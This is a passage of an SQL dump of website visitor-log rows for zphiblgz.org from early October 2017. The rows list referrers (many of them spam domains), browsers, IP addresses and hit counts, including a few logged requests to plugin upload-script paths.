',1,0),(12056,'2017-10-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(12057,'2017-10-02','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(12058,'2017-10-02','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.16','000',1,0),(12059,'2017-10-02','http://zphiblgz.org','G-i-g-a-b-o-t','Unknown','Unknown','','65.132.59.34','000',2,0),(12060,'2017-10-02','http://zphiblgz.org','Safari','iPhone','10.0','','216.99.180.241','000',1,0),(12061,'2017-10-02','http://zphiblgz.org','Firefox','Windows','40.1','','181.197.229.122','000',2,0),(12062,'2017-10-02','https://www.google.com/','Safari','iPhone','11.0','','208.54.35.209','000',1,0),(12063,'2017-10-02','http://zphiblgz.org','Firefox','Windows','40.1','','138.204.23.143','000',2,0),(12064,'2017-10-02','http://zphiblgz.org','Firefox','Windows','29.0','','119.39.124.173','000',2,0),(12065,'2017-10-02','http://zphiblgz.org','MSIE','Windows','11.0','','34.209.182.200','000',2,0),(12066,'2017-10-02','http://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','146.185.223.221','000',2,0),(12067,'2017-10-02','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','73.201.134.68','000',4,0),(12068,'2017-10-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.164.154','000',1,0),(12069,'2017-10-02','https://landmania.ru/','Opera','Windows','8.00','','37.115.189.113','000',2,0),(12070,'2017-10-02','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','182.50.132.70','000',1,0),(12071,'2017-10-02','https://bizlist.com.de/','MSIE','Windows','6.0','','37.115.189.113','000',1,0),(12072,'2017-10-02','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','104.168.141.15','000',1,0),(12073,'2017-10-02','http://zphiblgz.org','Firefox','Windows','40.1','','85.218.95.246','000',2,0),(12074,'2017-10-02','https://www.google.com/','Chrome','Android','61.0.3163.98','','107.77.104.25','000',1,0),(12075,'2017-10-02','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','192.40.95.35','000',2,0),(12076,'2017-10-02','http://pavlodar.xkaz.org/','MSIE','Windows','6.0','','37.115.191.27','000',8,0),(12077,'2017-10-02','http://zphiblgz.org','Firefox','Windows','40.1','','74.87.138.126','000',2,0),(12078,'2017-10-02','http://zphiblgz.org','Firefox','Windows','40.1','','92.237.203.50','000',2,0),(12079,'2017-10-02','https://sajatvelemeny.com/','MSIE','Windows','2.0','','188.163.74.19','000',1,0),(12080,'2017-10-02','https://ikritikimou.gr/','MSIE','Windows','5.5','','188.163.74.19','000',2,0),(12081,'2017-10-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','145.239.74.47','000',1,0),(12082,'2017-10-03','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.93.250','000',1,0),(12083,'2017-10-03','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',45,0),(12084,'2017-10-03','http://03e.info/','MSIE','Windows','5.5','','46.118.154.110','000',2,0),(12085,'2017-10-03','https://google.com','Firefox','Windows','2.0.0.13','','77.220.213.18','000',1,0),(12086,'2017-10-03','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.74','000',4,0),(12087,'2017-10-03','http://zphiblgz.org','python-requests','Unknown','2.7.0','','54.245.1.61','000',28,0),(12088,'2017-10-03','http://zphiblgz.org','Safari','Linux','534.34','','54.245.1.61','000',28,0),(12089,'2017-10-03','http://besthoro.ru/','MSIE','Windows','5.5','','37.115.189.113','000',3,0),(12090,'2017-10-03','http://zphiblgz.org','Faraday','Unknown','Unknown','','54.196.43.115','000',1,0),(12091,'2017-10-03','http://zphiblgz.org','Chrome','Windows','40.0.2214.115','','45.32.129.200','000',1,0),(12092,'2017-10-03','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',1,0),(12093,'2017-10-03','https://kandidos.com/','MSIE','Windows','6.0','','178.137.177.108','000',1,0),(12094,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.62','000',2,0),(12095,'2017-10-03','http://weburok.com/','MSIE','Windows','6.0','','46.118.154.110','000',1,0),(12096,'2017-10-03','http://zphiblgz.org','Chrome','Chrome OS','60.0.3112.114','','69.143.35.179','000',5,0),(12097,'2017-10-03','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(12098,'2017-10-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.61','000',1,0),(12099,'2017-10-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.36','000',1,0),(12100,'2017-10-03','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',2,0),(12101,'2017-10-03','http://komputers-best.ru/','MSIE','Windows','6.0','','37.115.191.27','000',2,0),(12102,'2017-10-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','103.7.41.211','000',12,0),(12103,'2017-10-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','66.85.170.171','000',1,0),(12104,'2017-10-03','http://zphiblgz.org','Firefox','Linux','30.0','','54.89.59.242','000',1,0),(12105,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',1,0),(12106,'2017-10-03','http://zphiblgz.org','Firefox','Windows','17.0','','77.222.100.91','000',1,0),(12107,'2017-10-03','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','212.227.24.20','000',2,0),(12108,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',1,0),(12109,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(12110,'2017-10-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','95.168.216.151','000',1,0),(12111,'2017-10-03','http://zphiblgz.org','Firefox','Windows','40.1','','85.245.245.151','000',2,0),(12112,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','146.185.177.103','000',1,0),(12113,'2017-10-03','http://zphiblgz.org/','MSIE','Windows','6.0','','186.101.223.135','000',1,0),(12114,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.68','000',2,0),(12115,'2017-10-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(12116,'2017-10-03','http://zphiblgz.org','Firefox','Windows','40.1','','91.61.180.82','000',2,0),(12117,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.45','000',1,0),(12118,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.180.193.219','000',2,0),(12119,'2017-10-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',2,0),(12120,'2017-10-03','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(12121,'2017-10-03','http://zphiblgz.org','Firefox','Windows','40.1','','104.6.107.95','000',1,0),(12122,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','67.205.146.164','000',2,0),(12123,'2017-10-03','http://zphiblgz.org','Firefox','Windows','40.1','','190.189.181.206','000',2,0),(12124,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.132','000',1,0),(12125,'2017-10-03','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.101.234','000',1,0),(12126,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.163.1.11','000',2,0),(12127,'2017-10-03','http://pk-services.ru/','Opera','Windows','9.0','','188.163.74.19','000',1,0),(12128,'2017-10-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','84.53.225.118','000',1,0),(12129,'2017-10-03','http://zphiblgz.org','Firefox','Windows','40.1','','188.50.173.108','000',2,0),(12130,'2017-10-04','http://zphiblgz.org','curl','Unknown','7.54.1','','176.74.217.68','000',1,0),(12131,'2017-10-04','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',69,0),(12132,'2017-10-04','http://zphiblgz.org','MSIE','Windows','11.0','','118.21.156.50','000',1,0),(12133,'2017-10-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','130.211.102.243','000',2,0),(12134,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.1','','2.96.40.8','000',2,0),(12135,'2017-10-04','http://zphiblgz.org/','MSIE','Windows','8.0','','80.40.134.104','000',1,0),(12136,'2017-10-04','http://ivanovo.zrus.org/','MSIE','Windows','6.0','','46.118.154.110','000',1,0),(12137,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.0','','139.162.167.155','000',2,0),(12138,'2017-10-04','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','172.104.158.206','000',1,0),(12139,'2017-10-04','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','139.162.148.238','000',1,0),(12140,'2017-10-04','http://zphiblgz.org','Firefox','Windows','45.0','','139.162.150.59','000',1,0),(12141,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.1','','84.127.214.3','000',2,0),(12142,'2017-10-04','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','73.128.243.51','000',7,0),(12143,'2017-10-04','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.74','000',2,0),(12144,'2017-10-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.54','000',1,0),(12145,'2017-10-04','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.62.44','000',1,0),(12146,'2017-10-04','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.100.43','000',1,0),(12147,'2017-10-04','zphiblgz.org','Chrome','Windows','47.0.1335.75','','82.117.194.229','000',1,0),(12148,'2017-10-04','http://zphiblgz.org','Safari','iPhone','10.0','','97.34.192.89','000',1,0),(12149,'2017-10-04','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.144.221.131','000',1,0),(12150,'2017-10-04','http://optom-deshevo.ru/','Opera','Windows','8.00','','46.118.154.110','000',2,0),(12151,'2017-10-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(12152,'2017-10-04','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(12153,'2017-10-04','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','163.172.255.19','000',1,0),(12154,'2017-10-04','http://www.zphibmaryland.org/chapters/','Chrome','Android','61.0.3163.98','','166.137.240.78','000',9,0),(12155,'2017-10-04','http://zphiblgz.org','M','Unknown','Unknown','','207.182.140.210','000',2,0),(12156,'2017-10-04','https://undergroundcityphoto.com/','Opera','Windows','6.0','','188.163.74.19','000',1,0),(12157,'2017-10-04','http://zphiblgz.org','Firefox','Windows','46.0','','172.104.158.206','000',1,0),(12158,'2017-10-04','http://zphiblgz.org','Firefox','Windows','45.0','','139.162.148.238','000',1,0),(12159,'2017-10-04','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','139.162.162.104','000',1,0),(12160,'2017-10-04','http://zphiblgz.org','Safari','Macintosh','9.1','','139.162.138.64','000',1,0),(12161,'2017-10-04','http://zphiblgz.org','Firefox','Windows','46.0','','139.162.150.59','000',1,0),(12162,'2017-10-04','http://zphiblgz.org','Firefox','Windows','45.0','','172.104.151.105','000',2,0),(12163,'2017-10-04','http://zphiblgz.org','Safari','Macintosh','9.1','','172.104.152.224','000',1,0),(12164,'2017-10-04','https://landmania.ru/','Unknown','Unknown','Unknown','','37.115.189.113','000',2,0),(12165,'2017-10-04','http://03p.info/','MSIE','Windows','6.0','','37.115.189.113','000',1,0),(12166,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.0','','139.162.171.76','000',1,0),(12167,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.0','','172.104.147.202','000',1,0),(12168,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.0','','172.104.144.158','000',1,0),(12169,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.0','','139.162.142.13','000',1,0),(12170,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.0','','85.90.247.115','000',1,0),(12171,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.0','','139.162.155.203','000',1,0),(12172,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.0','','139.162.175.100','000',1,0),(12173,'2017-10-04','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',1,0),(12174,'2017-10-04','https://mojpreskumanie.com/','MSIE','Windows','6.0','','188.163.74.19','000',1,0),(12175,'2017-10-04','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.30','000',1,0),(12176,'2017-10-04','https://colobit.biz/?ref=kissska','MSIE','Windows','5.0','','46.118.154.110','000',3,0),(12177,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.1','','177.73.6.45','000',2,0),(12178,'2017-10-04','http://zphiblgz.org','Firefox','Windows','40.1','','216.48.161.18','000',2,0),(12179,'2017-10-04','https://via-energy-cumpara.com/','MSIE','Unknown','6.0','','37.115.191.27','000',6,0),(12180,'2017-10-04','http://zphiblgz.org','Firefox','Windows','45.0','','172.104.158.206','000',1,0),(12181,'2017-10-04','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','139.162.150.59','000',1,0),(12182,'2017-10-04','http://zphiblgz.org','Safari','Macintosh','9.1','','139.162.128.239','000',1,0),(12183,'2017-10-04','http://zphiblgz.org','MSIE','Windows','11.0','','172.104.152.224','000',1,0),(12184,'2017-10-04','http://zphiblgz.org','Chrome','Macintosh','50.0.2661.94','','139.162.138.64','000',1,0),(12185,'2017-10-04','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','139.162.138.64','000',1,0),(12186,'2017-10-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','178.33.130.154','000',1,0),(12187,'2017-10-04','http://missis.top/','Opera','Windows','8.00','','178.137.177.108','000',3,0),(12188,'2017-10-05','https://xn----dtbndd4ae7eub.top/','MSIE','Windows','5.5','','37.115.189.113','000',2,0),(12189,'2017-10-05','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',54,0),(12190,'2017-10-05','http://zphiblgz.org','Firefox','Windows','40.0','','172.104.144.158','000',4,0),(12191,'2017-10-05','http://zphiblgz.org','Firefox','Windows','40.0','','172.104.147.202','000',7,0),(12192,'2017-10-05','http://zphiblgz.org','Chrome','Windows','50.0.2661.94','','139.162.150.59','000',1,0),(12193,'2017-10-05','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','172.104.151.105','000',1,0),(12194,'2017-10-05','http://zphiblgz.org','Edge','Windows','13.10586','','139.162.148.238','000',1,0),(12195,'2017-10-05','http://zphiblgz.org','Firefox','Windows','40.0','','139.162.167.155','000',5,0),(12196,'2017-10-05','http://zphiblgz.org','Firefox','Windows','40.0','','139.162.175.100','000',4,0),(12197,'2017-10-05','http://zphiblgz.org','Firefox','Windows','40.0','','85.90.247.115','000',5,0),(12198,'2017-10-05','http://zphiblgz.org','Edge','Windows','13.10586','','139.162.162.104','000',2,0),(12199,'2017-10-05','http://zphiblgz.org','Firefox','Windows','45.0','','139.162.138.64','000',1,0),(12200,'2017-10-05','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','139.162.128.239','000',2,0),(12201,'2017-10-05','http://zphiblgz.org','Chrome','Macintosh','50.0.2661.86','','172.104.152.224','000',1,0),(12202,'2017-10-05','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','139.162.138.64','000',1,0),(12203,'2017-10-05','http://zphiblgz.org','Chrome','Windows','49.0.2623.110','','139.162.128.239','000',3,0),(12204,'2017-10-05','http://zphiblgz.org','Chrome','Windows','50.0.2661.94','','172.104.158.206','000',1,0),(12205,'2017-10-05','http://zphiblgz.org','Firefox','Macintosh','45.0','','139.162.150.59','000',1,0),(12206,'2017-10-05','http://zphiblgz.org','Firefox','Windows','40.0','','139.162.155.203','000',7,0),(12207,'2017-10-05','http://zphiblgz.org','Chrome','Macintosh','50.0.2661.86','','172.104.151.105','000',1,0),(12208,'2017-10-05','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','139.162.148.238','000',1,0),(12209,'2017-10-05','http://zphiblgz.org','Firefox','Linux','45.0','','139.162.150.59','000',1,0),(12210,'2017-10-05','http://zphiblgz.org','Safari','Macintosh','9.1','','172.104.152.224','000',1,0),(12211,'2017-10-05','http://zphiblgz.org','Edge','Windows','13.10586','','139.162.128.239','000',1,0),(12212,'2017-10-05','http://zphiblgz.org','Firefox','Windows','45.0','','139.162.148.238','000',1,0),(12213,'2017-10-05','http://zphiblgz.org','Firefox','Windows','40.0','','139.162.171.76','000',3,0),(12214,'2017-10-05','http://zphiblgz.org','Firefox','Linux','45.0','','172.104.152.224','000',1,0),(12215,'2017-10-05','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.112','','139.162.128.239','000',1,0),(12216,'2017-10-05','http://zphiblgz.org','Edge','Windows','13.10586','','172.104.158.206','000',1,0),(12217,'2017-10-05','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','139.162.162.104','000',1,0),(12218,'2017-10-05','http://zphiblgz.org','Chrome','Windows','49.0.2623.112','','172.104.158.206','000',1,0),(12219,'2017-10-05','http://zphiblgz.org','MSIE','Windows','11.0','','172.104.152.224','000',1,0),(12220,'2017-10-05','http://zphiblgz.org','Firefox','Windows','40.0','','139.162.142.13','000',1,0),(12221,'2017-10-05','http://technika-remont.ru/','Opera','Windows','8.00','','46.118.154.110','000',1,0),(12222,'2017-10-05','http://zphiblgz.org','MSIE','Windows','11.0','','139.162.150.59','000',2,0),(12223,'2017-10-05','http://zphiblgz.org','Firefox','Windows','45.0','','172.104.152.224','000',2,0),(12224,'2017-10-05','http://zphiblgz.org','Chrome','Windows','49.0.2623.110','','139.162.138.64','000',1,0),(12225,'2017-10-05','http://zphiblgz.org','Firefox','Windows','40.1','','81.67.16.129','000',2,0),(12226,'2017-10-05','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.144.221.131','000',1,0),(12227,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.209.42.84','000',1,0),(12228,'2017-10-05','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','185.191.204.13','000',4,0),(12229,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',2,0),(12230,'2017-10-05','http://zphiblgz.org','Firefox','Windows','32.0','','46.101.21.75','000',1,0),(12231,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.58.127.10','000',2,0),(12232,'2017-10-05','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.112.83','000',1,0),(12233,'2017-10-05','http://krasivoe-hd.net/','MSIE','Windows','6.0','','37.115.189.113','000',1,0),(12234,'2017-10-05','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',2,0),(12235,'2017-10-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.121','000',1,0),(12236,'2017-10-05','http://krassh.ru/','MSIE','Windows','6.0','','178.137.177.108','000',2,0),(12237,'2017-10-05','http://zphiblgz.org','wonderbot','Unknown','JS','','82.208.160.181','000',1,0),(12238,'2017-10-05','https://bioscorp.ru/','MSIE','Windows','2.0d','','37.115.191.27','000',3,0),(12239,'2017-10-05','http://wikiurls.com/?http://zphiblgz.org/','Safari','Macintosh','10.1.2','','71.179.81.192','000',2,0),(12240,'2017-10-05','http://zphiblgz.org','MSIE','Windows','11.0','','34.209.182.200','000',1,0),(12241,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.31.172.234','000',2,0),(12242,'2017-10-05','http://zphiblgz.org','Safari','iPhone','10.0','','97.34.192.197','000',1,0),(12243,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.230.5','000',1,0),(12244,'2017-10-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','217.115.10.131','000',1,0),(12245,'2017-10-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(12246,'2017-10-05','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(12247,'2017-10-05','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(12248,'2017-10-05','http://zphiblgz.org','Chrome','Macintosh','26.0.1410.65','','52.4.244.57','000',1,0),(12249,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.163.1.11','000',1,0),(12250,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(12251,'2017-10-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.249.224.64','000',1,0),(12252,'2017-10-05','http://zphiblgz.org','Safari','iPhone','9.0','','113.128.104.102','000',1,0),(12253,'2017-10-05','http://zphiblgz.org','Safari','iPhone','9.0','','58.248.204.117','000',1,0),(12254,'2017-10-05','http://pk-services.ru/','MSIE','Windows','5.0','','188.163.74.19','000',1,0),(12255,'2017-10-05','http://zphiblgz.org','Firefox','Windows','40.1','','41.142.243.8','000',2,0),(12256,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',1,0),(12257,'2017-10-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.160.102.166','000',1,0),(12258,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.139.161','000',2,0),(12259,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.17.101.79','000',2,0),(12260,'2017-10-05','http://zphiblgz.org','Opera','Windows','12.14','','34.215.102.129','000',2,0),(12261,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.62.146','000',1,0),(12262,'2017-10-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','142.44.166.241','000',1,0),(12263,'2017-10-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',1,0),(12264,'2017-10-05','https://www.google.com/','Chrome','Android','51.0.2704.106','','71.244.253.23','000',7,0),(12265,'2017-10-05','http://zphiblgz.org','Microsoft','Unknown','Unknown','','162.193.38.231','000',2,0),(12266,'2017-10-05','http://zphiblgz.org','MSIE','Windows','7.0','','162.193.38.231','000',2,0),(12267,'2017-10-05','http://zphiblgz.org','Firefox','Windows','52.0','','162.193.38.231','000',1,0),(12268,'2017-10-05','https://www.google.com/','Safari','iPhone','11.0','','72.12.205.51','000',1,0),(12269,'2017-10-05','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.206','000',1,0),(12270,'2017-10-05','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','24.3.211.195','000',2,0),(12271,'2017-10-05','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.99.141.225','000',1,0),(12272,'2017-10-06','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',51,0),(12273,'2017-10-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.115','000',2,0),(12274,'2017-10-06','http://www.zphiblgz.org','Chrome','Macintosh','60.0.3112.90','','104.236.63.174','000',2,0),(12275,'2017-10-06','http://zphiblgz.org/administrator/components/com_simplephotogallery/lib/uploadFile.php','Chrome','Windows','42.0.2311.152','','209.90.225.218','000',1,0),(12276,'2017-10-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.208.198.50','000',1583,0),(12277,'2017-10-06','http://zphiblgz.org/','Chrome','Linux','59.0.3071.86','','107.173.254.214','000',1,0),(12278,'2017-10-06','http://zphiblgz.org/','Opera','Windows','12.17','','107.173.254.214','000',2,0),(12279,'2017-10-06','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(12280,'2017-10-06','http://zphiblgz.org','Firefox','Windows','40.1','','119.153.106.224','000',2,0),(12281,'2017-10-06','http://zphiblgz.org','Firefox','Windows','40.1','','37.210.219.162','000',2,0),(12282,'2017-10-06','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.74','000',4,0),(12283,'2017-10-06','zphiblgz.org','Chrome','Windows','50.0.2661.75','','173.236.142.123','000',2,0),(12284,'2017-10-06','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',3,0),(12285,'2017-10-06','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','34.214.254.227','000',1,0),(12286,'2017-10-06','http://optom-deshevo.ru/','Unknown','Unknown','Unknown','','46.118.159.224','000',2,0),(12287,'2017-10-06','http://irkutsk.zrus.org/','MSIE','Windows','6.0','','46.118.159.224','000',2,0),(12288,'2017-10-06','zphiblgz.org','Chrome','Windows','50.0.2661.75','','149.202.33.10','000',13,0),(12289,'2017-10-06','zphiblgz.org','Chrome','Windows','50.0.2661.75','','5.135.138.188','000',13,0),(12290,'2017-10-06','http://www.zphibmaryland.org/chapters/','Firefox','Windows','55.0','','168.18.233.254','000',6,0),(12291,'2017-10-06','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','178.32.107.137','000',1,0),(12292,'2017-10-06','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','137.74.46.103','000',1,0),(12293,'2017-10-06','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','198.51.197.174','000',5,0),(12294,'2017-10-06','https://landmania.ru/','MSIE','Windows','6.0','','37.115.189.113','000',4,0),(12295,'2017-10-06','http://zphiblgz.org','Firefox','Windows','40.1','','156.218.103.79','000',2,0),(12296,'2017-10-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',2,0),(12297,'2017-10-06','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','41.227.35.187','000',7,0),(12298,'2017-10-06','http://zphiblgz.org','Chrome','Windows','36.0.1985.67','','41.227.35.187','000',1,0),(12299,'2017-10-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','41.227.35.187','000',1,0),(12300,'2017-10-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(12301,'2017-10-06','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(12302,'2017-10-06','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjfiLyU4NzWAhXJKCYKHZTbCCoQFggoMAA&url=http%3A%2F%2Fzphiblgz.org%2Fts_teams%2Febony-cogdell%2F&usg=AOvVaw35DJ79fhKq8knF-U_WLfhc','MSIE','Windows','11.0','','8.44.100.11','000',3,0),(12303,'2017-10-06','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.12.150','000',1,0),(12304,'2017-10-06','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','164.132.107.59','000',1,0),(12305,'2017-10-06','http://www.zahvat.ru/','MSIE','Windows','6.0','','188.163.74.19','000',4,0),(12306,'2017-10-06','https://www.google.com/','Edge','Windows','15.15063','','96.244.71.21','000',1,0),(12307,'2017-10-06','http://zphiblgz.org','Chrome','Macintosh','43.0.2357.134','','218.92.147.30','000',1,0),(12308,'2017-10-06','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','145.239.89.247','000',1,0),(12309,'2017-10-06','zphiblgz.org','Opera','Windows','8.50','','195.22.127.63','000',1,0),(12310,'2017-10-06','http://zphiblgz.org/','Firefox','Linux','54.0','','114.236.160.34','000',3,0),(12311,'2017-10-06','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','23.30.213.229','000',6,0),(12312,'2017-10-06','http://zphiblgz.org','MSIE','Windows','11.0','','67.237.145.164','000',5,0),(12313,'2017-10-06','http://zphiblgz.org','Firefox','Linux','37.0','','107.175.128.126','000',2,0),(12314,'2017-10-06','http://zphiblgz.org/','Chrome','Windows','33.0.1750.146','','155.133.82.64','000',2,0),(12315,'2017-10-06','https://xn----dtbndd4ae7eub.top/','MSIE','Windows','5.5','','37.115.189.113','000',2,0),(12316,'2017-10-06','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','54.36.98.170','000',1,0),(12317,'2017-10-07','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','144.217.243.211','000',1,0),(12318,'2017-10-07','http://doxyporno.com/','MSIE','Windows','6.0','','37.115.191.27','000',4,0),(12319,'2017-10-07','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',36,0),(12320,'2017-10-07','http://zphiblgz.org','Firefox','Windows','3.0.3','','216.13.106.235','000',1,0),(12321,'2017-10-07','https://vsdshnik.com/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(12322,'2017-10-07','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','145.239.89.246','000',1,0),(12323,'2017-10-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.35','000',1,0),(12324,'2017-10-07','https://buyclomidonlaine.com/','MSIE','Windows','6.0','','37.115.189.113','000',2,0),(12325,'2017-10-07','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.74','000',1,0),(12326,'2017-10-07','http://zphiblgz.org','Firefox','Windows','40.1','','115.77.161.232','000',2,0),(12327,'2017-10-07','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','145.239.89.247','000',1,0),(12328,'2017-10-07','http://www.zphiblgz.org/modules/mod_artuploader/upload.php','Chrome','Windows','42.0.2311.152','','209.90.225.218','000',3,0),(12329,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.177.59.206','000',1,0),(12330,'2017-10-07','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.17.131','000',2,0),(12331,'2017-10-07','http://zphiblgz.org','MSIE','Windows','7.0','','153.16